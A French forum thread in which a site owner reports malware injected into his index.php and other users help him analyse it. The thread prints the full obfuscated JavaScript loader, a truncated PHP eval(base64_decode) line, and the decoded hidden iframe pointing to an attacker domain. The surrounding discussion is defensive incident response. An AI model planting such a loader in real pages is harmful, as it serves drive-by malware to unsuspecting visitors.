Discussion :

[Fanel]

Bonjour,

durant les vacances, je me suis aperçu qu'un virus était apparu sur l'un des sites que je gère. Si j'affiche la source de mon fichier index.php, voici ce qui a été inséré à la première ligne :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script>var s=new String();a=(new Function("","")+"").substr(3-1,4);if((a=="unct")||(a=="ncti"))a=(document.write+"").substr(2,4);if((a=="unct")||(a=="ncti")){r=1;c=String;}if(r&&document.createTextNode)u=2;e=window['e'+'v'+'al'];m=new Array(4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,49.5*u,234/u,59.5*u,214/u,49.5*u,222/u,61*u,226/u,49*u,92/u,50*u,208/u,49.5*u,224/u,23*u,196/u,52.5*u,244/u,23.5*u,126/u,51.5*u,222/u,30.5*u,98/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u,59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,49.5*u,234/u,59.5*u,214/u,49.5*u,222/u,61*u,226/u,49*u,92/u,50*u,208/u,49.5*u,224/u,23*u,196/u,52.5*u,244/u,23.5*u,126/u,51.5*u,222/u,30.5*u,98/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u);if((a=="unct")||(a=="ncti"))mm=c['fromCharCod'+'e'];for(i=0;i<m.length;i++)s+=mm(((a=="unct")||(a=="ncti"))?m[i]:123);if((a=="unct")||(a=="ncti"))e(s);</script>

Je suis donc allé télécharger le fichier index.php sur le FTP, et je trouve ceci à la première ligne :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNF [...] jBhU0lwS1dVb2N5azdQQzl6WTNKcGNIUSsnKSk7DQp9'));

Une conséquence visible de ce virus est que mon anti-virus devient fou, dès que j'affiche la page. J'imagine qu'il fait pas mal de dégâts sur des systèmes mal protégés.

Mon site propose un formulaire d'inscription, avec des champs input de type text et un champ input de type file. J'ai utilisé mysql_real_escape_string() pour éviter les injections SQL, mais apparement, cela ne suffit pas.

Comment puis-je sécuriser mon site pour éviter que ce virus revienne ?

Question subsidiaire, comment puis-je faire pour "remonter à la source", savoir qui essaye de placer ce virus sur mon site ?

[SpaceFrog]

Regarde sur ton ftp la date de modification des fichiers...
tu as sans doute un fichier modifié qui insère ce script, un fichiers htaccess ?

[Bovino]

Question subsidiaire, comment puis-je faire pour "remonter à la source", savoir qui essaye de placer ce virus sur mon site ?

Vu que le script insère l'iframe

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<iframe src='http://cuwkcozqb.dhcp.biz/?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

dans ta page, la réponse n'est pas trop compliquée à trouver...

[Fanel]

Vu que le script insère l'iframe

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<iframe src='http://cuwkcozqb.dhcp.biz/?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

dans ta page, la réponse n'est pas trop compliquée à trouver...

Comment as-tu fait pour afficher cette iframe ?

[Bovino]

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

String.fromCharCode()

[MrPringle]

Vu le domaine je ne suis pas certains que tu en tires grand-chose malheureusement.

Si tu as plusieurs sites et si tu utilises Filezilla, vérifie les tous et supprimes tous tes mots de passe enregistrés. Il y a un virus de ce genre qui se multiplie de la sorte et qui est visiblement une vraie plaie à enlever. Bon courage.

[Bovino]

Vu le domaine je ne suis pas certains que tu en tires grand-chose malheureusement.

Si, il y a une adresse IP associée : 91.196.216.134, qui renvoie à http://whois.domaintools.com/91.196.216.134

[Fanel]

Si tu as plusieurs sites et si tu utilises Filezilla, vérifie les tous et supprimes tous tes mots de passe enregistrés. Il y a un virus de ce genre qui se multiplie de la sorte et qui est visiblement une vraie plaie à enlever. Bon courage.

J'utilise effectivement Filezilla, et j'ai une 40aines de FTP enregistrés dessus (ceux de mes clients).. Il faudrait que je passe tous les sites au crible, et que je leur fasse modifier leur mot de passe FTP à tous ?

[MrPringle]

Non, mais déjà supprimes tous les mots de passe stockés (en clair c'est aberrant) dans Filezilla car c'est le facteur de développement du virus dont je parle. Ensuite fais un check, avec un peu de chance aucun n'est impacté.